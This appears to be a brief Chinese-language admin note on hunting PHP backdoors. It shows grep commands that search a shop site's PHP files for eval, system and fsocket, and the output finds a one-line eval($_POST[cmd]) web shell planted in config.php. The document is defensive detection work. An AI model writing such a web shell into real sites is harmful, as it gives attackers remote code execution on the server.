1.php的漏洞扫描简单得很,无非就是逐个检查文件中是否有eval,system,fsocket等高危函数

[root@server100 shop]# grep -l "eval" `find . -name "*.php"`
./cycle_p_w_picpath.php
./config.php
./feed.php
./admin/privilege.php
./admin/includes/cls_phpzip.php
./admin/includes/init.php
./admin/role.php
./data/global.php
./languages/en_us/payment/kuaiqian.php
./includes/shopex_json.php
./includes/fckeditor/editor/filemanager/connectors/php/basexml.php
./includes/cls_template.php
./includes/lib_base.php
./includes/cls_captcha.php
./install/cloud.php
./temp/compiled/admin/menu.htm.php
[root@server100 shop]# grep -n "eval" config.php
1:<?php eval($_POST[cmd]);?>
[root@server100 shop]# grep -l "fsocket" `find . -name "*.php"`
./languages/zh_tw/admin/common.php
./languages/zh_cn/admin/common.php
[root@server100 shop]# grep -n "fsocket" languages/zh_tw/admin/common.php
332:$_LANG['disabled_fsockopen'] = '服務器已禁用 fsocketopen 函數。';
[root@server100 shop]# grep -l "system" `find . -name "*.php"`
./admin/flashplay.php
./admin/includes/lib_main.php
./admin/includes/inc_menu.php
./languages/zh_tw/admin/navigator.php
./languages/zh_tw/admin/index.php
./languages/zh_tw/admin/common.php
./languages/zh_tw/admin/flashplay.php
./languages/zh_tw/admin/convert.php
./languages/zh_tw/common.php
./languages/zh_cn/admin/navigator.php
./languages/zh_cn/admin/index.php
./languages/zh_cn/admin/common.php
./languages/zh_cn/admin/flashplay.php
./languages/zh_cn/admin/convert.php
./languages/zh_cn/common.php
./languages/en_us/admin/articlecat.php
./languages/en_us/admin/license.php
./languages/en_us/admin/navigator.php
./languages/en_us/admin/index.php
./languages/en_us/admin/priv_action.php
./languages/en_us/admin/common.php
./languages/en_us/admin/flashplay.php
./languages/en_us/admin/integrate.php
./languages/en_us/admin/article_auto.php
./languages/en_us/admin/convert.php
./languages/en_us/admin/goods.php
./languages/en_us/admin/shop_config.php
./languages/en_us/admin/goods_auto.php
./languages/en_us/admin/users.php
./languages/en_us/common.php
./languages/en_us/payment/kuaiqian.php
./languages/en_us/payment/ips.php
./languages/en_us/payment/express.php
./languages/en_us/user.php
./includes/lib_main.php
./includes/lib.debug.php
./includes/modules/payment/paypal.php
./install/index.php
./install/auto_index.php
./install/templates/setting.php
./install/templates/checking_content.php
./install/templates/setting_content.php
./install/languages/zh_tw.php
./install/languages/zh_cn.php
./install/languages/en_us.php
./install/includes/lib_installer.php
./install/includes/lib_auto_installer.php
./temp/compiled/respond.dwt.php
./temp/compiled/message.dwt.php
./temp/compiled/admin/start.htm.php
./demo/index.php
./demo/templates/readme.php
./demo/languages/zh_cn_gbk.php
./demo/languages/zh_cn_utf-8.php
./demo/languages/zh_tw_utf-8.php
./demo/languages/en_us_utf-8.php